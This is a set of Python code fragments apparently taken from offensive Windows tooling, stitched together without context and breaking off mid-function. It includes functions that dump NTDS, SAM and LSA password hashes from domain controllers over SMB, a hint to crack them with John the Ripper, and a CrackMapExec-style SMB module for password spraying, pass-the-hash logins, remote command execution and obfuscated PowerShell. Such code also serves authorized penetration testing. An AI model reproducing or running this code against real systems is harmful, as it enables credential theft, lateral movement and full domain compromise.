def getNTDSInfo(user, password, domain, ip): print("[*] Trying to dump Domain users hashes...") conn = SMBConnection(ip, ip, None, 445) if conn.login(user, password, domain): print("[+] Successful SMB connection to the DC") r = RemoteOperations(conn, True) r.enableRegistry() bootkey = r.getBootKey() print("[*] Creating and parsing NTDS...") NTDSFileName = r.saveNTDS() NTDS = NTDSHashes(NTDSFileName, bootkey, isRemote=True, history=False, noLMHash=False, remoteOps=r, useVSSMethod=True, resumeSession=None, printUserStatus=False, outputFileName='DOMAIN_HASHES') print("[+] Success") print("[*] Dumping hashes from NTDS (could take a while)...") NTDS.dump() NTDS.finish() r.finish() conn.close() os.rename("DOMAIN_HASHES.ntds", "DOMAIN_HASHES.txt") os.remove("DOMAIN_HASHES.ntds.kerberos") if os.stat("DOMAIN_HASHES.ntds.cleartext").st_size == 0: os.remove("DOMAIN_HASHES.ntds.cleartext") else: print("[+] Cleartext passwords founds ! look in the file DOMAIN_HASHES.ntds.cleartext") print("[+] Successful dump of the users hashes in DOMAIN_HASHES.txt") print("You can use 'john --format=NT DOMAIN_HASHES.txt' to crack passwords and 'john --format=NT --show DOMAIN_HASHES.txt | cut -d: -f 1,2 > JOHN_RESULT.txt' when you finished")
def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None: logging.info( 'Started interactive SMB client shell via TCP on 127.0.0.1:%d' % self.tcpshell.port) #Start listening and launch interactive shell self.tcpshell.listen() self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell.socketfile) self.shell.cmdloop() return if self.config.exeFile is not None: result = self.installService.install() if result is True: logging.info("Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags( ) flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception, e: # Something wen't wrong, most probably we don't have access as admin. aborting logging.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote( self.config.command) logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = '' self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer) self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output') print self.__answerTMP.decode(self.config.encoding, 'replace') else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote=True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost() + '_samhashes') logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception, e: logging.error(str(e))
def run(self): # Here PUT YOUR CODE! if self.tcpshell is not None: logging.info("Started interactive SMB client shell via TCP on 127.0.0.1:%d" % self.tcpshell.port) # Start listening and launch interactive shell self.tcpshell.listen() self.shell = MiniImpacketShell(self.__SMBConnection, self.tcpshell.socketfile) self.shell.cmdloop() return if self.config.exeFile is not None: result = self.installService.install() if result is True: logging.info("Service Installed.. CONNECT!") self.installService.uninstall() else: from impacket.examples.secretsdump import RemoteOperations, SAMHashes samHashes = None try: # We have to add some flags just in case the original client did not # Why? needed for avoiding INVALID_PARAMETER flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags() flags2 |= smb.SMB.FLAGS2_LONG_NAMES self.__SMBConnection.getSMBServer().set_flags(flags2=flags2) remoteOps = RemoteOperations(self.__SMBConnection, False) remoteOps.enableRegistry() except Exception, e: # Something wen't wrong, most probably we don't have access as admin. aborting logging.error(str(e)) return try: if self.config.command is not None: remoteOps._RemoteOperations__executeRemote(self.config.command) logging.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost()) self.__answerTMP = "" self.__SMBConnection.getFile("ADMIN$", "Temp\\__output", self.__answer) self.__SMBConnection.deleteFile("ADMIN$", "Temp\\__output") else: bootKey = remoteOps.getBootKey() remoteOps._RemoteOperations__serviceDeleted = True samFileName = remoteOps.saveSAM() samHashes = SAMHashes(samFileName, bootKey, isRemote=True) samHashes.dump() samHashes.export(self.__SMBConnection.getRemoteHost() + "_samhashes") logging.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost()) except Exception, e: logging.error(str(e))
class DumpSecrets: def __init__(self, remoteName, username='', password='', domain='', options=None): self.__useVSSMethod = options.use_vss self.__remoteName = remoteName self.__remoteHost = options.target_ip self.__username = username self.__password = password self.__domain = domain self.__lmhash = '' self.__nthash = '' self.__aesKey = options.aesKey self.__smbConnection = None self.__remoteOps = None self.__SAMHashes = None self.__NTDSHashes = None self.__LSASecrets = None self.__systemHive = options.system self.__bootkey = options.bootkey self.__securityHive = options.security self.__samHive = options.sam self.__ntdsFile = options.ntds self.__history = options.history self.__noLMHash = True self.__isRemote = True self.__outputFileName = options.outputfile self.__doKerberos = options.k self.__justDC = options.just_dc self.__justDCNTLM = options.just_dc_ntlm self.__justUser = options.just_dc_user self.__pwdLastSet = options.pwd_last_set self.__printUserStatus = options.user_status self.__resumeFileName = options.resumefile self.__canProcessSAMLSA = True self.__kdcHost = options.dc_ip self.__options = options if options.hashes is not None: self.__lmhash, self.__nthash = options.hashes.split(':') def connect(self): self.__smbConnection = SMBConnection(self.__remoteName, self.__remoteHost) if self.__doKerberos: self.__smbConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash, self.__aesKey, self.__kdcHost) else: self.__smbConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash) def dump(self): try: if self.__remoteName.upper() == 'LOCAL' and self.__username == '': self.__isRemote = False self.__useVSSMethod = True if self.__systemHive: localOperations = LocalOperations(self.__systemHive) bootKey = localOperations.getBootKey() if self.__ntdsFile is not None: # Let's grab target's configuration about LM Hashes storage self.__noLMHash = localOperations.checkNoLMHashPolicy() else: import binascii bootKey = binascii.unhexlify(self.__bootkey) else: self.__isRemote = True bootKey = None try: try: self.connect() except Exception as e: if os.getenv( 'KRB5CCNAME' ) is not None and self.__doKerberos is True: # SMBConnection failed. That might be because there was no way to log into the # target system. We just have a last resort. Hope we have tickets cached and that they # will work logging.debug( 'SMBConnection didn\'t work, hoping Kerberos will help (%s)' % str(e)) pass else: raise self.__remoteOps = RemoteOperations( self.__smbConnection, self.__doKerberos, self.__kdcHost) self.__remoteOps.setExecMethod(self.__options.exec_method) if self.__justDC is False and self.__justDCNTLM is False or self.__useVSSMethod is True: self.__remoteOps.enableRegistry() bootKey = self.__remoteOps.getBootKey() # Let's check whether target system stores LM Hashes self.__noLMHash = self.__remoteOps.checkNoLMHashPolicy( ) except Exception as e: self.__canProcessSAMLSA = False if str(e).find('STATUS_USER_SESSION_DELETED') and os.getenv('KRB5CCNAME') is not None \ and self.__doKerberos is True: # Giving some hints here when SPN target name validation is set to something different to Off # This will prevent establishing SMB connections using TGS for SPNs different to cifs/ logging.error( 'Policy SPN target name validation might be restricting full DRSUAPI dump. Try -just-dc-user' ) else: logging.error('RemoteOperations failed: %s' % str(e)) # If RemoteOperations succeeded, then we can extract SAM and LSA if self.__justDC is False and self.__justDCNTLM is False and self.__canProcessSAMLSA: try: if self.__isRemote is True: SAMFileName = self.__remoteOps.saveSAM() else: SAMFileName = self.__samHive self.__SAMHashes = SAMHashes(SAMFileName, bootKey, isRemote=self.__isRemote) self.__SAMHashes.dump() if self.__outputFileName is not None: self.__SAMHashes.export(self.__outputFileName) except Exception as e: logging.error('SAM hashes extraction failed: %s' % str(e)) try: if self.__isRemote is True: SECURITYFileName = self.__remoteOps.saveSECURITY() else: SECURITYFileName = self.__securityHive self.__LSASecrets = LSASecrets(SECURITYFileName, bootKey, self.__remoteOps, isRemote=self.__isRemote, history=self.__history) self.__LSASecrets.dumpCachedHashes() if self.__outputFileName is not None: self.__LSASecrets.exportCached(self.__outputFileName) self.__LSASecrets.dumpSecrets() if self.__outputFileName is not None: self.__LSASecrets.exportSecrets(self.__outputFileName) except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error('LSA hashes extraction failed: %s' % str(e)) # NTDS Extraction we can try regardless of RemoteOperations failing. It might still work if self.__isRemote is True: if self.__useVSSMethod and self.__remoteOps is not None: NTDSFileName = self.__remoteOps.saveNTDS() else: NTDSFileName = None else: NTDSFileName = self.__ntdsFile self.__NTDSHashes = NTDSHashes( NTDSFileName, bootKey, isRemote=self.__isRemote, history=self.__history, noLMHash=self.__noLMHash, remoteOps=self.__remoteOps, useVSSMethod=self.__useVSSMethod, justNTLM=self.__justDCNTLM, pwdLastSet=self.__pwdLastSet, resumeSession=self.__resumeFileName, outputFileName=self.__outputFileName, justUser=self.__justUser, printUserStatus=self.__printUserStatus) try: self.__NTDSHashes.dump() except Exception as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0: # We don't store the resume file if this error happened, since this error is related to lack # of enough privileges to access DRSUAPI. resumeFile = self.__NTDSHashes.getResumeSessionFile() if resumeFile is not None: os.unlink(resumeFile) logging.error(e) if self.__justUser and str(e).find( "ERROR_DS_NAME_ERROR_NOT_UNIQUE") >= 0: logging.info( "You just got that error because there might be some duplicates of the same name. " "Try specifying the domain name for the user as well. It is important to specify it " "in the form of NetBIOS domain name/user (e.g. contoso/Administratror)." ) elif self.__useVSSMethod is False: logging.info( 'Something wen\'t wrong with the DRSUAPI approach. Try again with -use-vss parameter' ) self.cleanup() except (Exception, KeyboardInterrupt) as e: if logging.getLogger().level == logging.DEBUG: import traceback traceback.print_exc() logging.error(e) if self.__NTDSHashes is not None: if isinstance(e, KeyboardInterrupt): while True: answer = input("Delete resume session file? [y/N] ") if answer.upper() == '': answer = 'N' break elif answer.upper() == 'Y': answer = 'Y' break elif answer.upper() == 'N': answer = 'N' break if answer == 'Y': resumeFile = self.__NTDSHashes.getResumeSessionFile() if resumeFile is not None: os.unlink(resumeFile) try: self.cleanup() except: pass def cleanup(self): logging.info('Cleaning up... ') if self.__remoteOps: self.__remoteOps.finish() if self.__SAMHashes: self.__SAMHashes.finish() if self.__LSASecrets: self.__LSASecrets.finish() if self.__NTDSHashes: self.__NTDSHashes.finish()
class smb(connection): def __init__(self, args, db, host): self.domain = None self.server_os = None self.os_arch = 0 self.hash = None self.lmhash = '' self.nthash = '' self.remote_ops = None self.bootkey = None self.output_filename = None self.smbv1 = None self.signing = False self.smb_share_name = smb_share_name connection.__init__(self, args, db, host) @staticmethod def proto_args(parser, std_parser, module_parser): smb_parser = parser.add_parser('smb', help="own stuff using SMB", parents=[std_parser, module_parser]) smb_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes') smb_parser.add_argument("--no-bruteforce", action='store_true', help='No spray when using file for username and password (user1 => password1, user2 => password2') dgroup = smb_parser.add_mutually_exclusive_group() dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, help="domain to authenticate to") dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target') smb_parser.add_argument("--port", type=int, choices={445, 139}, default=445, help="SMB port (default: 445)") smb_parser.add_argument("--share", metavar="SHARE", default="C$", help="specify a share (default: C$)") smb_parser.add_argument("--smb-server-port", default="445", help="specify a server port for SMB", type=int) smb_parser.add_argument("--gen-relay-list", metavar='OUTPUT_FILE', help="outputs all hosts that don't require SMB signing to the specified file") smb_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes") cgroup = smb_parser.add_argument_group("Credential Gathering", "Options for gathering credentials") cegroup = cgroup.add_mutually_exclusive_group() cegroup.add_argument("--sam", action='store_true', help='dump SAM hashes from target systems') cegroup.add_argument("--lsa", action='store_true', help='dump LSA secrets from target systems') cegroup.add_argument("--ntds", choices={'vss', 'drsuapi'}, nargs='?', const='drsuapi', help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)") #cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history') #cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account') egroup = smb_parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating") egroup.add_argument("--shares", action="store_true", help="enumerate shares and access") egroup.add_argument("--sessions", action='store_true', help='enumerate active sessions') egroup.add_argument('--disks', action='store_true', help='enumerate disks') egroup.add_argument("--loggedon-users", action='store_true', help='enumerate logged on users') egroup.add_argument('--users', nargs='?', const='', metavar='USER', help='enumerate domain users, if a user is specified than only its information is queried.') egroup.add_argument("--groups", nargs='?', const='', metavar='GROUP', help='enumerate domain groups, if a group is specified than its members are enumerated') egroup.add_argument("--local-groups", nargs='?', const='', metavar='GROUP', help='enumerate local groups, if a group is specified than its members are enumerated') egroup.add_argument("--pass-pol", action='store_true', help='dump password policy') egroup.add_argument("--rid-brute", nargs='?', type=int, const=4000, metavar='MAX_RID', help='enumerate users by bruteforcing RID\'s (default: 4000)') egroup.add_argument("--wmi", metavar='QUERY', type=str, help='issues the specified WMI query') egroup.add_argument("--wmi-namespace", metavar='NAMESPACE', default='root\\cimv2', help='WMI Namespace (default: root\\cimv2)') sgroup = smb_parser.add_argument_group("Spidering", "Options for spidering shares") sgroup.add_argument("--spider", metavar='SHARE', type=str, help='share to spider') sgroup.add_argument("--spider-folder", metavar='FOLDER', default='.', type=str, help='folder to spider (default: root share directory)') sgroup.add_argument("--content", action='store_true', help='enable file content searching') sgroup.add_argument("--exclude-dirs", type=str, metavar='DIR_LIST', default='', help='directories to exclude from spidering') segroup = sgroup.add_mutually_exclusive_group() segroup.add_argument("--pattern", nargs='+', help='pattern(s) to search for in folders, filenames and file content') segroup.add_argument("--regex", nargs='+', help='regex(s) to search for in folders, filenames and file content') sgroup.add_argument("--depth", type=int, default=None, help='max spider recursion depth (default: infinity & beyond)') sgroup.add_argument("--only-files", action='store_true', help='only spider files') tgroup = smb_parser.add_argument_group("Files", "Options for put and get remote files") tgroup.add_argument("--put-file", nargs=2, metavar="FILE", help='Put a local file into remote target, ex: whoami.txt \\\\Windows\\\\Temp\\\\whoami.txt') tgroup.add_argument("--get-file", nargs=2, metavar="FILE", help='Get a remote file, ex: \\\\Windows\\\\Temp\\\\whoami.txt whoami.txt') cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands") cgroup.add_argument('--exec-method', choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None, help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)") cgroup.add_argument('--force-ps32', action='store_true', help='force the PowerShell command to run in a 32-bit process') cgroup.add_argument('--no-output', action='store_true', help='do not retrieve command output') cegroup = cgroup.add_mutually_exclusive_group() cegroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command") cegroup.add_argument("-X", metavar="PS_COMMAND", dest='ps_execute', help='execute the specified PowerShell command') psgroup = smb_parser.add_argument_group('Powershell Obfuscation', "Options for PowerShell script obfuscation") psgroup.add_argument('--obfs', action='store_true', help='Obfuscate PowerShell scripts') psgroup.add_argument('--clear-obfscripts', action='store_true', help='Clear all cached obfuscated PowerShell scripts') return parser def proto_logger(self): self.logger = CMEAdapter(extra={ 'protocol': 'SMB', 'host': self.host, 'port': self.args.port, 'hostname': self.hostname }) def get_os_arch(self): try: stringBinding = r'ncacn_ip_tcp:{}[135]'.format(self.host) transport = DCERPCTransportFactory(stringBinding) transport.set_connect_timeout(5) dce = transport.get_dce_rpc() if self.args.kerberos: dce.set_auth_type(RPC_C_AUTHN_GSS_NEGOTIATE) dce.connect() try: dce.bind(MSRPC_UUID_PORTMAP, transfer_syntax=('71710533-BEBA-4937-8319-B5DBEF9CCC36', '1.0')) except (DCERPCException, e): if str(e).find('syntaxes_not_supported') >= 0: dce.disconnect() return 32 else: dce.disconnect() return 64 except Exception as e: logging.debug('Error retrieving os arch of {}: {}'.format(self.host, str(e))) return 0 def enum_host_info(self): self.local_ip = self.conn.getSMBServer().get_socket().getsockname()[0] try: self.conn.login('' , '') except: #if "STATUS_ACCESS_DENIED" in e: pass self.domain = self.conn.getServerDNSDomainName() self.hostname = self.conn.getServerName() self.server_os = self.conn.getServerOS() self.signing = self.conn.isSigningRequired() if self.smbv1 else self.conn._SMBConnection._Connection['RequireSigning'] self.os_arch = self.get_os_arch() self.output_filename = os.path.expanduser('~/.cme/logs/{}_{}_{}'.format(self.hostname, self.host, datetime.now().strftime("%Y-%m-%d_%H%M%S"))) if not self.domain: self.domain = self.hostname self.db.add_computer(self.host, self.hostname, self.domain, self.server_os) try: ''' DC's seem to want us to logoff first, windows workstations sometimes reset the connection (go home Windows, you're drunk) ''' self.conn.logoff() except: pass if self.args.domain: self.domain = self.args.domain if self.args.local_auth: self.domain = self.hostname #Re-connect since we logged off self.create_conn_obj() def print_host_info(self): self.logger.info(u"{}{} (name:{}) (domain:{}) (signing:{}) (SMBv1:{})".format(self.server_os, ' x{}'.format(self.os_arch) if self.os_arch else '', self.hostname, self.domain, self.signing, self.smbv1)) def kerberos_login(self, aesKey, kdcHost): # dirty code to check if user is admin but pywerview does not support kerberos auth ... error = '' try: self.conn.kerberosLogin('', '', self.domain, self.lmhash, self.nthash, aesKey, kdcHost) # self.check_if_admin() # currently pywerview does not support kerberos auth except SessionError as e: error = e try: self.conn.connectTree("C$") self.admin_privs = True except SessionError as e: pass if not error: out = u'{}\\{} {}'.format(self.domain, self.conn.getCredentials()[0], highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')) self.logger.success(out) return True else: self.logger.error(u'{} {} {}'.format(self.domain, error, '({})'.format(desc) if self.args.verbose else '')) return False # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321 if self.signing: try: self.conn.logoff() except: pass self.create_conn_obj() def plaintext_login(self, domain, username, password): try: self.password = password self.username = username self.domain = domain self.conn.login(username, password, domain) self.check_if_admin() self.db.add_credential('plaintext', domain, username, password) if self.admin_privs: self.db.add_admin_user('plaintext', domain, username, password, self.host) out = u'{}\\{}:{} {}'.format(domain, username, password, highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')) self.logger.success(out) if not self.args.continue_on_success: return True elif self.signing: # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321 try: self.conn.logoff() except: pass self.create_conn_obj() except SessionError as e: error, desc = e.getErrorString() self.logger.error(u'{}\\{}:{} {} {}'.format(domain, username, password, error, '({})'.format(desc) if self.args.verbose else ''), color='magenta' if error in smb_error_status else 'red') if error not in smb_error_status: self.inc_failed_login(username) return False if not self.args.continue_on_success: return True def hash_login(self, domain, username, ntlm_hash): lmhash = '' nthash = '' #This checks to see if we didn't provide the LM Hash if ntlm_hash.find(':') != -1: lmhash, nthash = ntlm_hash.split(':') else: nthash = ntlm_hash try: self.hash = ntlm_hash if lmhash: self.lmhash = lmhash if nthash: self.nthash = nthash self.username = username self.domain = domain self.conn.login(username, '', domain, lmhash, nthash) self.check_if_admin() self.db.add_credential('hash', domain, username, ntlm_hash) if self.admin_privs: self.db.add_admin_user('hash', domain, username, ntlm_hash, self.host) out = u'{}\\{} {} {}'.format(domain, username, ntlm_hash, highlight('({})'.format(self.config.get('CME', 'pwn3d_label')) if self.admin_privs else '')) self.logger.success(out) if not self.args.continue_on_success: return True # check https://github.com/byt3bl33d3r/CrackMapExec/issues/321 if self.signing: try: self.conn.logoff() except: pass self.create_conn_obj() except SessionError as e: error, desc = e.getErrorString() self.logger.error(u'{}\\{}:{} {} {}'.format(domain, username, ntlm_hash, error, '({})'.format(desc) if self.args.verbose else ''), color='magenta' if error in smb_error_status else 'red') if error not in smb_error_status: self.inc_failed_login(username) return False if not self.args.continue_on_success: return True def create_smbv1_conn(self): try: self.conn = SMBConnection(self.host, self.host, None, self.args.port, preferredDialect=SMB_DIALECT) self.smbv1 = True except socket.error as e: if str(e).find('Connection reset by peer') != -1: logging.debug('SMBv1 might be disabled on {}'.format(self.host)) return False except Exception as e: logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e)) return False return True def create_smbv3_conn(self): try: self.conn = SMBConnection(self.host, self.host, None, self.args.port) self.smbv1 = False except socket.error: return False except Exception as e: logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e)) return False return True def create_conn_obj(self): if self.create_smbv1_conn(): return True elif self.create_smbv3_conn(): return True return False def check_if_admin(self): lmhash = '' nthash = '' if self.hash: if self.hash.find(':') != -1: lmhash, nthash = self.hash.split(':') else: nthash = self.hash self.admin_privs = invoke_checklocaladminaccess(self.host, self.domain, self.username, self.password, lmhash, nthash) def gen_relay_list(self): if self.server_os.lower().find('windows') != -1 and self.signing is False: with sem: with open(self.args.gen_relay_list, 'a+') as relay_list: if self.host not in relay_list.read(): relay_list.write(self.host + '\n') @requires_admin @requires_smb_server def execute(self, payload=None, get_output=False, methods=None): if self.args.exec_method: methods = [self.args.exec_method] if not methods : methods = ['wmiexec', 'mmcexec', 'atexec', 'smbexec'] if not payload and self.args.execute: payload = self.args.execute if not self.args.no_output: get_output = True for method in methods: if method == 'wmiexec': try: exec_method = WMIEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.kerberos, self.aesKey, self.kdcHost, self.hash, self.args.share) logging.debug('Executed command via wmiexec') break except: logging.debug('Error executing command via wmiexec, traceback:') logging.debug(format_exc()) continue elif method == 'mmcexec': try: exec_method = MMCEXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.conn, self.hash) logging.debug('Executed command via mmcexec') break except: logging.debug('Error executing command via mmcexec, traceback:') logging.debug(format_exc()) continue elif method == 'atexec': try: exec_method = TSCH_EXEC(self.host, self.smb_share_name, self.username, self.password, self.domain, self.kerberos, self.aesKey, self.kdcHost, self.hash) #self.args.share) logging.debug('Executed command via atexec') break except: logging.debug('Error executing command via atexec, traceback:') logging.debug(format_exc()) continue elif method == 'smbexec': try: exec_method = SMBEXEC(self.host, self.smb_share_name, self.args.port, self.username, self.password, self.domain, self.kerberos, self.aesKey, self.kdcHost, self.hash, self.args.share) logging.debug('Executed command via smbexec') break except: logging.debug('Error executing command via smbexec, traceback:') logging.debug(format_exc()) continue if hasattr(self, 'server'): self.server.track_host(self.host) output = u'{}'.format(exec_method.execute(payload, get_output).strip()) if self.args.execute or self.args.ps_execute: self.logger.success('Executed command {}'.format('via {}'.format(self.args.exec_method) if self.args.exec_method else '')) buf = StringIO(output).readlines() for line in buf: self.logger.highlight(line.strip()) return output @requires_admin def ps_execute(self, payload=None, get_output=False, methods=None, force_ps32=False, dont_obfs=False): if not payload and self.args.ps_execute: payload = self.args.ps_execute if not self.args.no_output: get_output = True if os.path.isfile(payload): with open(payload) as commands: for c in commands: self.execute(create_ps_command(c, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods) else: self.execute(create_ps_command(payload, force_ps32=force_ps32, dont_obfs=dont_obfs), get_output, methods) return '' def shares(self): temp_dir = ntpath.normpath("\\" + gen_random_string()) #hostid,_,_,_,_,_,_ = self.db.get_hosts(filterTerm=self.host)[0] permissions = [] try: for share in self.conn.listShares(): share_name = share['shi1_netname'][:-1] share_remark = share['shi1_remark'][:-1] share_info = {'name': share_name, 'remark': share_remark, 'access': []} read = False write = False try: self.conn.listPath(share_name, '*') read = True share_info['access'].append('READ') except SessionError: pass try: self.conn.createDirectory(share_name, temp_dir) self.conn.deleteDirectory(share_name, temp_dir) write = True share_info['access'].append('WRITE') except SessionError: pass permissions.append(share_info) #self.db.add_share(hostid, share_name, share_remark, read, write) self.logger.success('Enumerated shares') self.logger.highlight('{:<15} {:<15} {}'.format('Share', 'Permissions', 'Remark')) self.logger.highlight('{:<15} {:<15} {}'.format('-----', '-----------', '------')) for share in permissions: name = share['name'] remark = share['remark'] perms = share['access'] self.logger.highlight(u'{:<15} {:<15} {}'.format(name, ','.join(perms), remark)) except Exception as e: error, desc = e.getErrorString() self.logger.error('Error enumerating shares: {}'.format(error), color='magenta' if error in smb_error_status else 'red') return permissions def get_dc_ips(self): dc_ips = [] for dc in self.db.get_domain_controllers(domain=self.domain): dc_ips.append(dc[1]) if not dc_ips: dc_ips.append(self.host) return dc_ips def sessions(self): sessions = get_netsession(self.host, self.domain, self.username, self.password, self.lmhash, self.nthash) self.logger.success('Enumerated sessions') for session in sessions: if session.sesi10_cname.find(self.local_ip) == -1: self.logger.highlight('{:<25} User:{}'.format(session.sesi10_cname, session.sesi10_username)) return sessions def disks(self): disks = [] try: disks = get_localdisks(self.host, self.domain, self.username, self.password, self.lmhash, self.nthash) self.logger.success('Enumerated disks') for disk in disks: self.logger.highlight(disk.disk) except Exception as e: error, desc = e.getErrorString() self.logger.error('Error enumerating disks: {}'.format(error), color='magenta' if error in smb_error_status else 'red') return disks def local_groups(self): groups = [] #To enumerate local groups the DC IP is optional, if specified it will resolve the SIDs and names of any domain accounts in the local group for dc_ip in self.get_dc_ips(): try: groups = get_netlocalgroup(self.host, dc_ip, '', self.username, self.password, self.lmhash, self.nthash, queried_groupname=self.args.local_groups, list_groups=True if not self.args.local_groups else False, recurse=False) if self.args.local_groups: self.logger.success('Enumerated members of local group') else: self.logger.success('Enumerated local groups') for group in groups: if group.name: if not self.args.local_groups: self.logger.highlight('{:<40} membercount: {}'.format(group.name, group.membercount)) self.db.add_group(self.hostname, group.name) else: domain, name = group.name.split('/') self.logger.highlight('{}\\{}'.format(domain.upper(), name)) try: group_id = self.db.get_groups(groupName=self.args.local_groups, groupDomain=domain)[0][0] except IndexError: group_id = self.db.add_group(domain, self.args.local_groups) # yo dawg, I hear you like groups. So I put a domain group as a member of a local group which is also a member of another local group. # (╯°□°)╯︵ ┻━┻ if not group.isgroup: self.db.add_user(domain, name, group_id) elif group.isgroup: self.db.add_group(domain, name) break except Exception as e: self.logger.error('Error enumerating local groups of {}: {}'.format(self.host, e)) return groups def domainfromdsn(self, dsn): dsnparts = dsn.split(',') domain = "" for part in dsnparts: k,v = part.split("=") if k == "DC": if domain=="": domain = v else: domain = domain+"."+v return domain def groups(self): groups = [] for dc_ip in self.get_dc_ips(): if self.args.groups: try: groups = get_netgroupmember(dc_ip, '', self.username, password=self.password, lmhash=self.lmhash, nthash=self.nthash, queried_groupname=self.args.groups, queried_sid=str(), queried_domain=str(), ads_path=str(), recurse=False, use_matching_rule=False, full_data=False, custom_filter=str()) self.logger.success('Enumerated members of domain group') for group in groups: self.logger.highlight('{}\\{}'.format(group.memberdomain, group.membername)) try: group_id = self.db.get_groups(groupName=self.args.groups, groupDomain=group.groupdomain)[0][0] except IndexError: group_id = self.db.add_group(group.groupdomain, self.args.groups) if not group.isgroup: self.db.add_user(group.memberdomain, group.membername, group_id) elif group.isgroup: self.db.add_group(group.groupdomain, group.groupname) break except Exception as e: self.logger.error('Error enumerating domain group members using dc ip {}: {}'.format(dc_ip, e)) else: try: groups = get_netgroup(dc_ip, '', self.username, password=self.password, lmhash=self.lmhash, nthash=self.nthash, queried_groupname=str(), queried_sid=str(), queried_username=str(), queried_domain=str(), ads_path=str(), admin_count=False, full_data=True, custom_filter=str()) self.logger.success('Enumerated domain group(s)') for group in groups: self.logger.highlight('{:<40} membercount: {}'.format(group.samaccountname, len(group.member) if hasattr(group, 'member') else 0)) if bool(group.isgroup) is True: # Since there isn't a groupmemeber attribute on the returned object from get_netgroup we grab it from the distinguished name domain = self.domainfromdsn(group.distinguishedname) self.db.add_group(domain, group.samaccountname) break except Exception as e: self.logger.error('Error enumerating domain group using dc ip {}: {}'.format(dc_ip, e)) return groups def users(self): users = [] for dc_ip in self.get_dc_ips(): try: users = get_netuser(dc_ip, '', self.username, password=self.password, lmhash=self.lmhash, nthash=self.nthash, queried_username=self.args.users, queried_domain='', ads_path=str(), admin_count=False, spn=False, unconstrained=False, allow_delegation=False, custom_filter=str()) self.logger.success('Enumerated domain user(s)') for user in users: domain = self.domainfromdsn(user.distinguishedname) self.logger.highlight('{}\\{:<30} badpwdcount: {} baddpwdtime: {}'.format(domain,user.samaccountname,getattr(user,'badpwdcount',0),getattr(user, 'badpasswordtime',''))) self.db.add_user(domain, user.samaccountname) break except Exception as e: logging.debug('Error enumerating domain users using dc ip {}: {}'.format(dc_ip, e)) return users def loggedon_users(self): loggedon = [] try: loggedon = get_netloggedon(self.host, self.domain, self.username, self.password, lmhash=self.lmhash, nthash=self.nthash) self.logger.success('Enumerated loggedon users') for user in loggedon: self.logger.highlight('{}\\{:<25} {}'.format(user.wkui1_logon_domain, user.wkui1_username, 'logon_server: {}'.format(user.wkui1_logon_server) if user.wkui1_logon_server else '')) except Exception as e: self.logger.error('Error enumerating logged on users: {}'.format(e)) return loggedon def pass_pol(self): return PassPolDump(self).dump() @requires_admin def wmi(self, wmi_query=None, namespace=None): records = [] if not namespace: namespace = self.args.wmi_namespace try: rpc = RPCRequester(self.host, self.domain, self.username, self.password, self.lmhash, self.nthash) rpc._create_wmi_connection(namespace=namespace) if wmi_query: query = rpc._wmi_connection.ExecQuery(wmi_query, lFlags=WBEM_FLAG_FORWARD_ONLY) else: query = rpc._wmi_connection.ExecQuery(self.args.wmi, lFlags=WBEM_FLAG_FORWARD_ONLY) except Exception as e: self.logger.error('Error creating WMI connection: {}'.format(e)) return records while True: try: wmi_results = query.Next(0xffffffff, 1)[0] record = wmi_results.getProperties() records.append(record) for k,v in record.items(): self.logger.highlight('{} => {}'.format(k,v['value'])) self.logger.highlight('') except Exception as e: if str(e).find('S_FALSE') < 0: raise e else: break return records def spider(self, share=None, folder='.', pattern=[], regex=[], exclude_dirs=[], depth=None, content=False, onlyfiles=True): spider = SMBSpider(self.conn, self.logger) self.logger.info('Started spidering') start_time = time() if not share: 